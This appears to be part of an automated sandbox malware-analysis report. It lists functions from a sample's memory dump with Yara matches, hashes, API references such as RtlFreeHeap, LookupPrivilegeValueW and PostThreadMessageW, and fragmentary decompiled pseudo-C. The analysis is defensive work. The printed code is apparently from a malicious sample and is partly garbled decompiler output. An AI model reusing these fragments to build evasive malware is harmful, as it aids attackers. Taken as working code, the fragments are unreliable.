                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                                        • Instruction ID: b39a88afcfee89752d381567343b55fa3eb99d4b6067ad06a13de3de3180f2c5
                                                                                        • Opcode Fuzzy Hash: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                                        • Instruction Fuzzy Hash: 1490027220108802E2206199840474A0445D7D0341F55C465A442465CD86D588A1B161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                                        • Instruction ID: 721f9cb85ee728b2a5c9d17bf2a08e603cc9c910fa433705a222a7d8d73de292
                                                                                        • Opcode Fuzzy Hash: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                                        • Instruction Fuzzy Hash: E090026260100042925071A988449064445FBE1351751C175A0998558D85D98875A6A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                                        • Instruction ID: f8dafc996cad0b1420dcb86850c8424528aa4540b361dd03382a96d5af7b2aa9
                                                                                        • Opcode Fuzzy Hash: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                                        • Instruction Fuzzy Hash: 6F90027220140402E2106199481470B0445D7D0342F51C065A116455DD86A58861B5B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                                        • Instruction ID: 89217e3e766221b55d344b28853367cdf4ff66c9f2eed02b7efd8e73c17df286
                                                                                        • Opcode Fuzzy Hash: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                                        • Instruction Fuzzy Hash: C790027220100802E2907199440464A0445D7D1341F91C069A002565CDCA958A69B7E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                                        • Instruction ID: c31aad2699236ece3cc13049112d8348dfaa9e4ebf4db858b6c1282cf15b66a9
                                                                                        • Opcode Fuzzy Hash: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                                        • Instruction Fuzzy Hash: 4F90026221180042E31065A94C14B070445D7D0343F51C169A015455CCC9958871A561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                        • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                                                                                        • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                        • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                        • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                                                                                        • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                        • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                        • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                                                                                        • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                        • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                        • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                                                        • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                        • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A0A2, Relevance: 3.0, APIs: 2, Instructions: 49memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 2488874121-0
                                                                                        • Opcode ID: 0965005e2dce452d871df99e987b56b8226210ad74e858144096c5632e472370
                                                                                        • Instruction ID: 7177ada076c19e5f12ac84e6d69a36771d883204be9dbad6a8e9e42b3957b6f7
                                                                                        • Opcode Fuzzy Hash: 0965005e2dce452d871df99e987b56b8226210ad74e858144096c5632e472370
                                                                                        • Instruction Fuzzy Hash: A0018FB12012046FCB14EF65DC84DE77769EF88760F018949F85C5B242C535E9648BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A063, Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 19%
                                                                                        			E0041A063(void* __eflags, intOrPtr _a8, int _a12, long _a16, void* _a20) {
				char _t18;
				void* _t22;
				void* _t26;
				void* _t27;

				_pop(es);
				if(__eflags >= 0) {
					_t7 = _t27 + 0x6a;
					 *_t7 =  *((intOrPtr*)(_t27 + 0x6a)) + _t22;
					__eflags =  *_t7;
					_push(0);
					_push(0xd69);
					_push(0xed);
					E0041A960(_t26);
					ExitProcess(_a12);
				}
				asm("in eax, 0xc1");
				 *0xce443b12 = 0xed;
				_t15 = _a8;
				_push(_t27);
				_t3 = _t15 + 0xc74; // 0xc74
				E0041A960(_t26, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t18 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t18;
			}







                                                                                        0x0041a065
                                                                                        0x0041a066
                                                                                        0x0041a0bb
                                                                                        0x0041a0bb
                                                                                        0x0041a0bb
                                                                                        0x0041a0be
                                                                                        0x0041a0c8
                                                                                        0x0041a0c9
                                                                                        0x0041a0ca
                                                                                        0x0041a0d8
                                                                                        0x0041a0d8
                                                                                        0x0041a068
                                                                                        0x0041a06a
                                                                                        0x0041a073
                                                                                        0x0041a079
                                                                                        0x0041a07f
                                                                                        0x0041a087
                                                                                        0x0041a09d
                                                                                        0x0041a0a1

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitFreeHeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1180424539-0
                                                                                        • Opcode ID: 5e938ab661c113d8d7853c366110992ac1d380ba0c46417e929e3cb690f62961
                                                                                        • Instruction ID: c74340f0f204f7c4ddb17853360d15653bd2035839ab73c73f339d95e20bd8ed
                                                                                        • Opcode Fuzzy Hash: 5e938ab661c113d8d7853c366110992ac1d380ba0c46417e929e3cb690f62961
                                                                                        • Instruction Fuzzy Hash: A8F0AFB52152046FC710DF65DC85ED73B68AF48710F058949F9986B242C530EA54CBF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 21%
                                                                                        			E004082E9(void* __eax, signed int __ebx, signed int __edx, void* __esi, long _a12) {
				intOrPtr _v0;
				char _v71;
				char _v72;
				void* _t16;
				int _t17;
				long _t29;
				int _t32;
				void* _t34;
				void* _t36;
				void* _t37;

				_t31 = __esi;
				_t16 = __eax + 1;
				if(_t16 < 0) {
					_t34 = __esi - 1;
					 *(_t36 + __edx * 2 - 0x137c1375) =  *(_t36 + __edx * 2 - 0x137c1375) & __ebx;
					_push(_t36);
					_t36 = _t37;
					_t37 = _t37 - 0x40;
					_push(_t34);
					_v72 = 0;
					E0041B860( &_v71, 0, 0x3f);
					E0041C400( &_v72, 3);
					_t31 = _v0 + 0x1c;
					_t16 = E0040ACD0(__ebx, _t31, _t31,  &_v72); // executed
					_push(0xc4e7b6d6);
				}
				_push(0);
				_push(0);
				_push(_t16);
				_push(_t31);
				_t17 = E00414E20();
				_t32 = _t17;
				if(_t32 != 0) {
					_t29 = _a12;
					_t17 = PostThreadMessageW(_t29, 0x111, 0, 0); // executed
					_t45 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t32(_t29, 0x8003, _t36 + (E0040A460(_t45, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}













                                                                                        0x004082e9
                                                                                        0x004082ea
                                                                                        0x004082eb
                                                                                        0x004082ed
                                                                                        0x004082ee
                                                                                        0x004082f0
                                                                                        0x004082f1
                                                                                        0x004082f3
                                                                                        0x004082f6
                                                                                        0x004082ff
                                                                                        0x00408303
                                                                                        0x0040830e
                                                                                        0x0040831a
                                                                                        0x0040831e
                                                                                        0x00408323
                                                                                        0x00408323
                                                                                        0x00408328
                                                                                        0x0040832a
                                                                                        0x0040832c
                                                                                        0x0040832d
                                                                                        0x0040832e
                                                                                        0x00408333
                                                                                        0x0040833a
                                                                                        0x0040833d
                                                                                        0x0040834a
                                                                                        0x0040834c
                                                                                        0x0040834e
                                                                                        0x0040836b
                                                                                        0x0040836b
                                                                                        0x0040836d
                                                                                        0x00408372

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 32b5f2ab0ce1d72a80887b25adf5504f3b8a637ad157bef46505e07604a851b4
                                                                                        • Instruction ID: 34bbe34b11dd5259c0ca39b76f369e21f56f034487a877647d8497b709729909
                                                                                        • Opcode Fuzzy Hash: 32b5f2ab0ce1d72a80887b25adf5504f3b8a637ad157bef46505e07604a851b4
                                                                                        • Instruction Fuzzy Hash: FA012831A802287AE720A6959C02FFF371CAB40F14F04406EFF44BA1C1E6B8290647F9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 21%
                                                                                        			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;

				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E0040ACD0(__ebx, _t25, _t25,  &_v68); // executed
				_push(0xc4e7b6d6);
				_push(0);
				_push(0);
				_push(_t12);
				_push(_t25);
				_t13 = E00414E20();
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t34 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t34, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                        0x004082ff
                                                                                        0x00408303
                                                                                        0x0040830e
                                                                                        0x0040831a
                                                                                        0x0040831e
                                                                                        0x00408323
                                                                                        0x00408328
                                                                                        0x0040832a
                                                                                        0x0040832c
                                                                                        0x0040832d
                                                                                        0x0040832e
                                                                                        0x00408333
                                                                                        0x0040833a
                                                                                        0x0040833d
                                                                                        0x0040834a
                                                                                        0x0040834c
                                                                                        0x0040834e
                                                                                        0x0040836b
                                                                                        0x0040836b
                                                                                        0x00000000
                                                                                        0x0040836d
                                                                                        0x00408372

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                        • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                                                        • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                        • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419FF6, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 29%
                                                                                        			E00419FF6(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16, long _a20) {
				intOrPtr* _t10;
				void* _t12;
				void* _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t30;

				asm("cdq");
				asm("invalid");
				_t10 = __eax - 1;
				asm("in eax, dx");
				if(_t10 != 0) {
					 *_t10 =  *_t10 + _t10;
					_t12 = RtlAllocateHeap(_a12, _a16, _a20); // executed
					return _t12;
				} else {
					_t13 = _a4;
					_t3 = _t13 + 0xc6c; // 0xc6e
					_t28 = _t3;
					E0041A960(_t25, _a4, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x33);
					return  *((intOrPtr*)( *_t28))(_a8, _a12, _t26, _t30);
				}
			}









                                                                                        0x00419ff6
                                                                                        0x00419ff9
                                                                                        0x00419ffc
                                                                                        0x00419ffd
                                                                                        0x00419ffe
                                                                                        0x0041a04a
                                                                                        0x0041a05d
                                                                                        0x0041a061
                                                                                        0x0041a000
                                                                                        0x0041a003
                                                                                        0x0041a00f
                                                                                        0x0041a00f
                                                                                        0x0041a017
                                                                                        0x0041a02d
                                                                                        0x0041a02d

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 2647b45bffcd801f73d9c0736363aad6fc5a4f2dce0122f12ea199222f2f11bc
                                                                                        • Instruction ID: 9bee01f855e576d012b51444dc4617ca5ed8dab4dee5687391c625ca0ef1dd4f
                                                                                        • Opcode Fuzzy Hash: 2647b45bffcd801f73d9c0736363aad6fc5a4f2dce0122f12ea199222f2f11bc
                                                                                        • Instruction Fuzzy Hash: B4F06DB2204208AFCB14DF59DC81EA777ACEF88310F01845AFD4897242D631EA21C7B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                        0x0041a07f
                                                                                        0x0041a087
                                                                                        0x0041a09d
                                                                                        0x0041a0a1

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                        • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                        • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                        • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                        • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A1CD, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 58%
                                                                                        			E0041A1CD(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				asm("adc al, [esi]");
				_t7 = _a4;
				_push(0x8bec8b55);
				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                        0x0041a1cd
                                                                                        0x0041a1d3
                                                                                        0x0041a1dc
                                                                                        0x0041a1ea
                                                                                        0x0041a200
                                                                                        0x0041a204

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 431e216eb88fb675b7b69e9b0cc9413418eefefeb460bc5cf47297f391a99ec7
                                                                                        • Instruction ID: 69da784dda610ca12d50b0a5d4896b1bbde2ccdda0942303c661c59b3789c3dd
                                                                                        • Opcode Fuzzy Hash: 431e216eb88fb675b7b69e9b0cc9413418eefefeb460bc5cf47297f391a99ec7
                                                                                        • Instruction Fuzzy Hash: C2E0DFB92042542BCB10DF55DC81EE73BA8DF49260F19899DFCC927203C434A815C7B4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                        0x0041a1ea
                                                                                        0x0041a200
                                                                                        0x0041a204

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                        • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                        • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                        • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                        • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                                        • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                                                                                        • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                                        • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00407AFA, Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b92d8b50086bc345f7877eff2e93f094f563e00cecaa5b8488f0b7591810ef2c
                                                                                        • Instruction ID: 4708e62bd899175b96ecaf619090e675afbf9490ae0be420ebba9b83cdee91d7
